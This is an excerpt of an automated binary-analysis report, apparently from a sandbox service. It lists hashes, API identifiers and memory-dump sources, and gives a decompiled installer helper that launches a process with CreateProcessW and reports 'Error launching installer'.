                                                                                                                • String ID: HideWindow
                                                                                                                • API String ID: 1249568736-780306582
                                                                                                                • Opcode ID: 13cbdd23df18d036de9d5c22efd7f5e469270204adcf9325ac20a19b3184ad94
                                                                                                                • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                • Opcode Fuzzy Hash: 13cbdd23df18d036de9d5c22efd7f5e469270204adcf9325ac20a19b3184ad94
                                                                                                                • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405C6B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405C6B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x461dd0->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0, 0, 0, 0x461dd0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                0x00405c85
                                                                                                                0x00405c90
                                                                                                                0x00405c98
                                                                                                                0x00405c9d
                                                                                                                0x00000000
                                                                                                                0x00405ca3
                                                                                                                0x00405ca7

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Error launching installer, xrefs: 00405C74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                • String ID: Error launching installer
                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%